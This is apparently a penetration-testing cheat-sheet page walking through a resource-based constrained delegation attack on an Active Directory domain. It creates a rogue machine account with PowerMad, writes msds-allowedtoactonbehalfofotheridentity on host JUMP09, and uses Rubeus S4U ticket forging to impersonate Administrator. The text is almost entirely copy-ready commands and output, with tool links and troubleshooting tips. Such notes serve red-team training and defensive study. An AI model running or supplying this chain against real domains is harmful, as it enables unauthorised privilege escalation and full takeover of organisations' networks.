Example attack

Create machine using PowerMad

New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)

Get SID of created machine

$ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid

Get raw bytes, make sure to replace the SID (the random letters are static)

$SD = New-Object Security.AccessControl.RawSecurityDescriptor "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-2032401531-514583578-4118054891-6101)"; $SDBytes = New-Object byte[] ($SD.BinaryLength);
$SD.GetBinaryForm($SDBytes, 0);

In this example we have GenericWrite on JUMP09, lets abuse these rights to give ourselves msds-allowedtoactonbehalfofotheridentity neccessary for RBCD.

Get-DomainComputer JUMP09 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

Generate password hash using Rubeus (make sure to use same password as before)

.\Rubeus.exe hash /password:Summer2018!

rc4_hmac             : EF266C6B963C0BB683941032008AD47F

If having issues with generation, try different version/bit of Rubeus

Generate the ticket!

.\Rubeus.exe s4u /user:attackersystem$ /domain:ops.comply.com /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:Administrator /msdsspn:http/jump09 /altservice:cifs,host /ptt /nowrap

Test if successful

dir \\jump09\c$

Tooling

https://raw.githubusercontent.com/Kevin-Robertson/Powermad/master/Powermad.ps1

Last updated 2 years ago